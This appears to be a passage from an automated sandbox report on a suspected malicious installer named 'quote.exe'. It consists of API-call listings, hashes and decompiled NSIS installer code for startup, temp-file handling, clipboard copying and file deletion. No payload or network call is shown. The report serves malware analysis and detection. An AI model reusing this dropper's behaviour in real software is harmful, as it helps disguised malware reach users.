                                                                                      0x0040367c
                                                                                      0x0040367c
                                                                                      0x00403675
                                                                                      0x00403688
                                                                                      0x0040369b
                                                                                      0x0040369c
                                                                                      0x004036b1
                                                                                      0x004036b7
                                                                                      0x004036bb
                                                                                      0x00000000
                                                                                      0x004036e2
                                                                                      0x004036e2
                                                                                      0x004036e7
                                                                                      0x004036f0
                                                                                      0x004036f5
                                                                                      0x004036f5
                                                                                      0x00000000
                                                                                      0x004036f5
                                                                                      0x004036bb
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004035ee
                                                                                      0x004035ee
                                                                                      0x004035ef
                                                                                      0x004035f0
                                                                                      0x00000000
                                                                                      0x004036c3
                                                                                      0x004036ca
                                                                                      0x004036d0
                                                                                      0x004036d3
                                                                                      0x004036d3
                                                                                      0x004036d4
                                                                                      0x004036d7
                                                                                      0x00000000
                                                                                      0x004036e0
                                                                                      0x0040351a
                                                                                      0x0040351b
                                                                                      0x00403527
                                                                                      0x0040352e
                                                                                      0x00000000
                                                                                      0x00403530
                                                                                      0x00403532
                                                                                      0x00403540
                                                                                      0x00403545
                                                                                      0x0040354c
                                                                                      0x00403550
                                                                                      0x00403554
                                                                                      0x00403556
                                                                                      0x00403556
                                                                                      0x00403554
                                                                                      0x00000000
                                                                                      0x0040354c

                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE ref: 004034E8
                                                                                      • GetVersion.KERNEL32 ref: 004034EE
                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403521
                                                                                      • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040355E
                                                                                      • OleInitialize.OLE32(00000000), ref: 00403565
                                                                                      • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403581
                                                                                      • GetCommandLineW.KERNEL32(00433F00,NSIS Error,?,00000007,00000009,0000000B), ref: 00403596
                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\quote.exe" ,00000020,"C:\Users\user\Desktop\quote.exe" ,00000000,?,00000007,00000009,0000000B), ref: 004035CE
                                                                                        • Part of subcall function 00406806: GetModuleHandleA.KERNEL32(?,00000020,?,00403537,0000000B), ref: 00406818
                                                                                        • Part of subcall function 00406806: GetProcAddress.KERNEL32(00000000,?), ref: 00406833
                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403708
                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403719
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403725
                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403739
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403741
                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403752
                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040375A
                                                                                      • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 0040376E
                                                                                        • Part of subcall function 00406411: lstrcpynW.KERNEL32(?,?,00000400,00403596,00433F00,NSIS Error,?,00000007,00000009,0000000B), ref: 0040641E
                                                                                      • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403839
                                                                                      • ExitProcess.KERNEL32 ref: 0040385A
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040386D
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040387C
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403887
                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\quote.exe" ,00000000,00000007,?,00000007,00000009,0000000B), ref: 00403893
                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004038AF
                                                                                      • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,00000009,?,00000007,00000009,0000000B), ref: 00403909
                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\quote.exe,0042AA28,00000001,?,00000007,00000009,0000000B), ref: 0040391D
                                                                                      • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000,?,00000007,00000009,0000000B), ref: 0040394A
                                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403979
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403980
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403995
                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 004039B8
                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 004039DD
                                                                                      • ExitProcess.KERNEL32 ref: 00403A00
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\quote.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Susendes\Scrumption$C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Dioxide\Spokeswoman\Gelatinous\Passado195$C:\Users\user\Desktop$C:\Users\user\Desktop\quote.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                      • API String ID: 3441113951-3249435054
                                                                                      • Opcode ID: 57a9a2dd428d2fdd19cbdf93519aac93b81e27b25fad92e5b66dcc7ddb2898c7
                                                                                      • Instruction ID: 633452ec6b1f102921f1489b21fe302f429ce1b90f1906ff0e0a9b5b291269fb
                                                                                      • Opcode Fuzzy Hash: 57a9a2dd428d2fdd19cbdf93519aac93b81e27b25fad92e5b66dcc7ddb2898c7
                                                                                      • Instruction Fuzzy Hash: 7DD12671600311ABE7207F659D45B3B3AACEB8070AF11443FF581B62D1DBBD89518B6E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 139 4055b8-4055d3 140 405762-405769 139->140 141 4055d9-4056a0 GetDlgItem * 3 call 40439c call 404cf5 GetClientRect GetSystemMetrics SendMessageW * 2 139->141 142 405793-4057a0 140->142 143 40576b-40578d GetDlgItem CreateThread CloseHandle 140->143 159 4056a2-4056bc SendMessageW * 2 141->159 160 4056be-4056c1 141->160 145 4057a2-4057a8 142->145 146 4057be-4057c8 142->146 143->142 149 4057e3-4057ec call 4043ce 145->149 150 4057aa-4057b9 ShowWindow * 2 call 40439c 145->150 151 4057ca-4057d0 146->151 152 40581e-405822 146->152 163 4057f1-4057f5 149->163 150->146 156 4057d2-4057de call 404340 151->156 157 4057f8-405808 ShowWindow 151->157 152->149 154 405824-40582a 152->154 154->149 161 40582c-40583f SendMessageW 154->161 156->149 164 405818-405819 call 404340 157->164 165 40580a-405813 call 405479 157->165 159->160 167 4056d1-4056e8 call 404367 160->167 168 4056c3-4056cf SendMessageW 160->168 169 405941-405943 161->169 170 405845-405870 CreatePopupMenu call 40644e AppendMenuW 161->170 164->152 165->164 178 4056ea-4056fe ShowWindow 167->178 179 40571e-40573f GetDlgItem SendMessageW 167->179 168->167 169->163 176 405872-405882 GetWindowRect 170->176 177 405885-40589a TrackPopupMenu 170->177 176->177 177->169 180 4058a0-4058b7 177->180 181 405700-40570b ShowWindow 178->181 182 40570d 178->182 179->169 183 405745-40575d SendMessageW * 2 179->183 184 4058bc-4058d7 SendMessageW 180->184 185 405713-405719 call 40439c 181->185 182->185 183->169 184->184 186 4058d9-4058fc OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 4058fe-405925 SendMessageW 186->188 188->188 189 405927-40593b GlobalUnlock SetClipboardData CloseClipboard 188->189 189->169
                                                                                      C-Code - Quality: 96%
                                                                                      			E004055B8(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                      				struct HWND__* _v8;
                                                                                      				long _v12;
                                                                                      				struct tagRECT _v28;
                                                                                      				void* _v36;
                                                                                      				signed int _v40;
                                                                                      				int _v44;
                                                                                      				int _v48;
                                                                                      				signed int _v52;
                                                                                      				int _v56;
                                                                                      				void* _v60;
                                                                                      				void* _v68;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				struct HWND__* _t94;
                                                                                      				long _t95;
                                                                                      				int _t100;
                                                                                      				int _t101;
                                                                                      				long _t104;
                                                                                      				void* _t108;
                                                                                      				intOrPtr _t119;
                                                                                      				void* _t127;
                                                                                      				intOrPtr _t130;
                                                                                      				struct HWND__* _t134;
                                                                                      				int _t156;
                                                                                      				int _t159;
                                                                                      				struct HMENU__* _t164;
                                                                                      				struct HWND__* _t168;
                                                                                      				struct HWND__* _t169;
                                                                                      				int _t171;
                                                                                      				void* _t172;
                                                                                      				short* _t173;
                                                                                      				short* _t175;
                                                                                      				int _t177;
                                                                                      
                                                                                      				_t169 =  *0x433ee4; // 0x1044c
                                                                                      				_t156 = 0;
                                                                                      				_v8 = _t169;
                                                                                      				if(_a8 != 0x110) {
                                                                                      					__eflags = _a8 - 0x405;
                                                                                      					if(_a8 == 0x405) {
                                                                                      						_t127 = CreateThread(0, 0, E0040554C, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                                                      						CloseHandle(_t127); // executed
                                                                                      					}
                                                                                      					__eflags = _a8 - 0x111;
                                                                                      					if(_a8 != 0x111) {
                                                                                      						L17:
                                                                                      						_t171 = 1;
                                                                                      						__eflags = _a8 - 0x404;
                                                                                      						if(_a8 != 0x404) {
                                                                                      							L25:
                                                                                      							__eflags = _a8 - 0x7b;
                                                                                      							if(_a8 != 0x7b) {
                                                                                      								goto L20;
                                                                                      							}
                                                                                      							_t94 = _v8;
                                                                                      							__eflags = _a12 - _t94;
                                                                                      							if(_a12 != _t94) {
                                                                                      								goto L20;
                                                                                      							}
                                                                                      							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                                      							__eflags = _t95 - _t156;
                                                                                      							_a8 = _t95;
                                                                                      							if(_t95 <= _t156) {
                                                                                      								L36:
                                                                                      								return 0;
                                                                                      							}
                                                                                      							_t164 = CreatePopupMenu();
                                                                                      							AppendMenuW(_t164, _t156, _t171, E0040644E(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                                      							_t100 = _a16;
                                                                                      							__eflags = _a16 - 0xffffffff;
                                                                                      							_t159 = _a16 >> 0x10;
                                                                                      							if(_a16 == 0xffffffff) {
                                                                                      								GetWindowRect(_v8,  &_v28);
                                                                                      								_t100 = _v28.left;
                                                                                      								_t159 = _v28.top;
                                                                                      							}
                                                                                      							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
                                                                                      							__eflags = _t101 - _t171;
                                                                                      							if(_t101 == _t171) {
                                                                                      								_v60 = _t156;
                                                                                      								_v48 = 0x42d268;
                                                                                      								_v44 = 0x1000;
                                                                                      								_a4 = _a8;
                                                                                      								do {
                                                                                      									_a4 = _a4 - 1;
                                                                                      									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
                                                                                      									__eflags = _a4 - _t156;
                                                                                      									_t171 = _t171 + _t104 + 2;
                                                                                      								} while (_a4 != _t156);
                                                                                      								OpenClipboard(_t156);
                                                                                      								EmptyClipboard();
                                                                                      								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                                      								_a4 = _t108;
                                                                                      								_t172 = GlobalLock(_t108);
                                                                                      								do {
                                                                                      									_v48 = _t172;
                                                                                      									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                                      									 *_t173 = 0xd;
                                                                                      									_t175 = _t173 + 2;
                                                                                      									 *_t175 = 0xa;
                                                                                      									_t172 = _t175 + 2;
                                                                                      									_t156 = _t156 + 1;
                                                                                      									__eflags = _t156 - _a8;
                                                                                      								} while (_t156 < _a8);
                                                                                      								GlobalUnlock(_a4);
                                                                                      								SetClipboardData(0xd, _a4);
                                                                                      								CloseClipboard();
                                                                                      							}
                                                                                      							goto L36;
                                                                                      						}
                                                                                      						__eflags =  *0x433ecc - _t156; // 0x0
                                                                                      						if(__eflags == 0) {
                                                                                      							ShowWindow( *0x434f08, 8);
                                                                                      							__eflags =  *0x434fac - _t156;
                                                                                      							if( *0x434fac == _t156) {
                                                                                      								_t119 =  *0x42c240; // 0x6bbd9c
                                                                                      								_t57 = _t119 + 0x34; // 0xffffffd5
                                                                                      								E00405479( *_t57, _t156);
                                                                                      							}
                                                                                      							E00404340(_t171);
                                                                                      							goto L25;
                                                                                      						}
                                                                                      						 *0x42ba38 = 2;
                                                                                      						E00404340(0x78);
                                                                                      						goto L20;
                                                                                      					} else {
                                                                                      						__eflags = _a12 - 0x403;
                                                                                      						if(_a12 != 0x403) {
                                                                                      							L20:
                                                                                      							return E004043CE(_a8, _a12, _a16);
                                                                                      						}
                                                                                      						ShowWindow( *0x433ed0, _t156);
                                                                                      						ShowWindow(_t169, 8);
                                                                                      						E0040439C(_t169);
                                                                                      						goto L17;
                                                                                      					}
                                                                                      				}
                                                                                      				_v52 = _v52 | 0xffffffff;
                                                                                      				_v40 = _v40 | 0xffffffff;
                                                                                      				_t177 = 2;
                                                                                      				_v60 = _t177;
                                                                                      				_v56 = 0;
                                                                                      				_v48 = 0;
                                                                                      				_v44 = 0;
                                                                                      				asm("stosd");
                                                                                      				asm("stosd");
                                                                                      				_t130 =  *0x434f14;
                                                                                      				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                                      				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                                      				 *0x433ed0 = GetDlgItem(_a4, 0x403);
                                                                                      				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
                                                                                      				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                                      				 *0x433ee4 = _t134;
                                                                                      				_v8 = _t134;
                                                                                      				E0040439C( *0x433ed0);
                                                                                      				 *0x433ed4 = E00404CF5(4);
                                                                                      				 *0x433eec = 0;
                                                                                      				GetClientRect(_v8,  &_v28);
                                                                                      				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                                      				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                                                      				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                                                      				if(_a8 >= 0) {
                                                                                      					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                                      					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                                      				}
                                                                                      				if(_a12 >= _t156) {
                                                                                      					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                                      				}
                                                                                      				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                      				_push(0x1b);
                                                                                      				E00404367(_a4);
                                                                                      				if(( *0x434f1c & 0x00000003) != 0) {
                                                                                      					ShowWindow( *0x433ed0, _t156);
                                                                                      					if(( *0x434f1c & 0x00000002) != 0) {
                                                                                      						 *0x433ed0 = _t156;
                                                                                      					} else {
                                                                                      						ShowWindow(_v8, 8);
                                                                                      					}
                                                                                      					E0040439C( *0x433ec8);
                                                                                      				}
                                                                                      				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                                      				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                                      				if(( *0x434f1c & 0x00000004) != 0) {
                                                                                      					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                                      					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                                      				}
                                                                                      				goto L36;
                                                                                      			}





































                                                                                      0x004055c0
                                                                                      0x004055c6
                                                                                      0x004055d0
                                                                                      0x004055d3
                                                                                      0x00405762
                                                                                      0x00405769
                                                                                      0x00405786
                                                                                      0x0040578d
                                                                                      0x0040578d
                                                                                      0x00405793
                                                                                      0x004057a0
                                                                                      0x004057be
                                                                                      0x004057c0
                                                                                      0x004057c1
                                                                                      0x004057c8
                                                                                      0x0040581e
                                                                                      0x0040581e
                                                                                      0x00405822
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405824
                                                                                      0x00405827
                                                                                      0x0040582a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405834
                                                                                      0x0040583a
                                                                                      0x0040583c
                                                                                      0x0040583f
                                                                                      0x00405941
                                                                                      0x00000000
                                                                                      0x00405941
                                                                                      0x0040584e
                                                                                      0x00405859
                                                                                      0x00405862
                                                                                      0x00405869
                                                                                      0x0040586d
                                                                                      0x00405870
                                                                                      0x00405879
                                                                                      0x0040587f
                                                                                      0x00405882
                                                                                      0x00405882
                                                                                      0x00405892
                                                                                      0x00405898
                                                                                      0x0040589a
                                                                                      0x004058a3
                                                                                      0x004058a6
                                                                                      0x004058ad
                                                                                      0x004058b4
                                                                                      0x004058bc
                                                                                      0x004058bc
                                                                                      0x004058ca
                                                                                      0x004058d0
                                                                                      0x004058d3
                                                                                      0x004058d3
                                                                                      0x004058da
                                                                                      0x004058e0
                                                                                      0x004058ec
                                                                                      0x004058f3
                                                                                      0x004058fc
                                                                                      0x004058fe
                                                                                      0x00405901
                                                                                      0x00405910
                                                                                      0x00405913
                                                                                      0x00405919
                                                                                      0x0040591a
                                                                                      0x00405920
                                                                                      0x00405921
                                                                                      0x00405922
                                                                                      0x00405922
                                                                                      0x0040592a
                                                                                      0x00405935
                                                                                      0x0040593b
                                                                                      0x0040593b
                                                                                      0x00000000
                                                                                      0x0040589a
                                                                                      0x004057ca
                                                                                      0x004057d0
                                                                                      0x00405800
                                                                                      0x00405802
                                                                                      0x00405808
                                                                                      0x0040580a
                                                                                      0x00405810
                                                                                      0x00405813
                                                                                      0x00405813
                                                                                      0x00405819
                                                                                      0x00000000
                                                                                      0x00405819
                                                                                      0x004057d4
                                                                                      0x004057de
                                                                                      0x00000000
                                                                                      0x004057a2
                                                                                      0x004057a2
                                                                                      0x004057a8
                                                                                      0x004057e3
                                                                                      0x00000000
                                                                                      0x004057ec
                                                                                      0x004057b1
                                                                                      0x004057b6
                                                                                      0x004057b9
                                                                                      0x00000000
                                                                                      0x004057b9
                                                                                      0x004057a0
                                                                                      0x004055d9
                                                                                      0x004055dd
                                                                                      0x004055e5
                                                                                      0x004055e9
                                                                                      0x004055ec
                                                                                      0x004055ef
                                                                                      0x004055f2
                                                                                      0x004055f5
                                                                                      0x004055f6
                                                                                      0x004055f7
                                                                                      0x00405610
                                                                                      0x00405613
                                                                                      0x0040561d
                                                                                      0x0040562c
                                                                                      0x00405634
                                                                                      0x0040563c
                                                                                      0x00405641
                                                                                      0x00405644
                                                                                      0x00405650
                                                                                      0x00405659
                                                                                      0x00405662
                                                                                      0x00405684
                                                                                      0x0040568a
                                                                                      0x0040569b
                                                                                      0x004056a0
                                                                                      0x004056ae
                                                                                      0x004056bc
                                                                                      0x004056bc
                                                                                      0x004056c1
                                                                                      0x004056cf
                                                                                      0x004056cf
                                                                                      0x004056d4
                                                                                      0x004056d7
                                                                                      0x004056dc
                                                                                      0x004056e8
                                                                                      0x004056f1
                                                                                      0x004056fe
                                                                                      0x0040570d
                                                                                      0x00405700
                                                                                      0x00405705
                                                                                      0x00405705
                                                                                      0x00405719
                                                                                      0x00405719
                                                                                      0x0040572d
                                                                                      0x00405736
                                                                                      0x0040573f
                                                                                      0x0040574f
                                                                                      0x0040575b
                                                                                      0x0040575b
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405616
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405625
                                                                                      • GetClientRect.USER32(?,?), ref: 00405662
                                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405669
                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040568A
                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040569B
                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004056AE
                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004056BC
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056CF
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056F1
                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405705
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405726
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405736
                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040574F
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040575B
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405634
                                                                                        • Part of subcall function 0040439C: SendMessageW.USER32(00000028,?,00000001,004041C7), ref: 004043AA
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405778
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000554C,00000000), ref: 00405786
                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 0040578D
                                                                                      • ShowWindow.USER32(00000000), ref: 004057B1
                                                                                      • ShowWindow.USER32(0001044C,00000008), ref: 004057B6
                                                                                      • ShowWindow.USER32(00000008), ref: 00405800
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405834
                                                                                      • CreatePopupMenu.USER32 ref: 00405845
                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405859
                                                                                      • GetWindowRect.USER32(?,?), ref: 00405879
                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405892
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058CA
                                                                                      • OpenClipboard.USER32(00000000), ref: 004058DA
                                                                                      • EmptyClipboard.USER32 ref: 004058E0
                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058EC
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004058F6
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040590A
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040592A
                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405935
                                                                                      • CloseClipboard.USER32 ref: 0040593B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1324601022.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1324552152.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324683262.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1324736673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325005143.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325059654.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325126784.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325184138.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325253333.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1325304342.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_quote.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                      • String ID: {
                                                                                      • API String ID: 590372296-366298937
                                                                                      • Opcode ID: f0fd2e1a1f6109bd428cca54ea167e09023d8e4ecaec3e055b9f768bc27e185c
                                                                                      • Instruction ID: ef42e6e7ad26681d1de71b6013131fdd69d98400fc0f56e042e978cac442fd71
                                                                                      • Opcode Fuzzy Hash: f0fd2e1a1f6109bd428cca54ea167e09023d8e4ecaec3e055b9f768bc27e185c
                                                                                      • Instruction Fuzzy Hash: 45B138B1900608FFDB11AFA0DE85AAE7B79FB44355F00803AFA41B61A0CB755E51DF68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 498 405b23-405b49 call 405dee 501 405b62-405b69 498->501 502 405b4b-405b5d DeleteFileW 498->502 504 405b6b-405b6d 501->504 505 405b7c-405b8c call 406411 501->505 503 405cdf-405ce3 502->503 507 405b73-405b76 504->507 508 405c8d-405c92 504->508 511 405b9b-405b9c call 405d32 505->511 512 405b8e-405b99 lstrcatW 505->512 507->505 507->508 508->503 510 405c94-405c97 508->510 513 405ca1-405ca9 call 40676f 510->513 514 405c99-405c9f 510->514 515 405ba1-405ba5 511->515 512->515 513->503 522 405cab-405cbf call 405ce6 call 405adb 513->522 514->503 518 405bb1-405bb7 lstrcatW 515->518 519 405ba7-405baf 515->519 521 405bbc-405bd8 lstrlenW FindFirstFileW 518->521 519->518 519->521 523 405c82-405c86 521->523 524 405bde-405be6 521->524 540 405cc1-405cc4 522->540 541 405cd7-405cda call 405479 522->541 523->508 526 405c88 523->526 527 405c06-405c1a call 406411 524->527 528 405be8-405bf0 524->528 526->508 538 405c31-405c3c call 405adb 527->538 539 405c1c-405c24 527->539 530 405bf2-405bfa 528->530 531 405c65-405c75 FindNextFileW 528->531 530->527 535 405bfc-405c04 530->535 531->524 534 405c7b-405c7c FindClose 531->534 534->523 535->527 535->531 551 405c5d-405c60 call 405479 538->551 552 405c3e-405c41 538->552 539->531 543 405c26-405c2f call 405b23 539->543 540->514 542 405cc6-405cd5 call 405479 call 4061d7 540->542 541->503 542->503 543->531 551->531 554 405c43-405c53 call 405479 call 4061d7 552->554 555 405c55-405c5b 552->555 554->531 555->531
                                                                                      C-Code - Quality: 98%
                                                                                      			E00405B23(void* __eflags, signed int _a4, signed int _a8) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				short _v556;
                                                                                      				short _v558;
                                                                                      				struct _WIN32_FIND_DATAW _v604;
                                                                                      				signed int _t38;
                                                                                      				signed int _t52;
                                                                                      				signed int _t55;
                                                                                      				signed int _t62;
                                                                                      				void* _t64;
                                                                                      				signed char _t65;
                                                                                      				WCHAR* _t66;
                                                                                      				void* _t67;
                                                                                      				WCHAR* _t68;
                                                                                      				void* _t70;
                                                                                      
                                                                                      				_t65 = _a8;
                                                                                      				_t68 = _a4;
                                                                                      				_v8 = _t65 & 0x00000004;
                                                                                      				_t38 = E00405DEE(__eflags, _t68);
                                                                                      				_v12 = _t38;
                                                                                      				if((_t65 & 0x00000008) != 0) {
                                                                                      					_t62 = DeleteFileW(_t68); // executed
                                                                                      					asm("sbb eax, eax");
                                                                                      					_t64 =  ~_t62 + 1;
                                                                                      					 *0x434fa8 =  *0x434fa8 + _t64;
                                                                                      					return _t64;
                                                                                      				}
                                                                                      				_a4 = _t65;
                                                                                      				_t8 =  &_a4;
                                                                                      				 *_t8 = _a4 & 0x00000001;
                                                                                      				__eflags =  *_t8;
                                                                                      				if( *_t8 == 0) {
                                                                                      					L5:
                                                                                      					E00406411(0x42f270, _t68);
                                                                                      					__eflags = _a4;
                                                                                      					if(_a4 == 0) {
                                                                                      						E00405D32(_t68);
                                                                                      					} else {
                                                                                      						lstrcatW(0x42f270, L"\\*.*");
                                                                                      					}
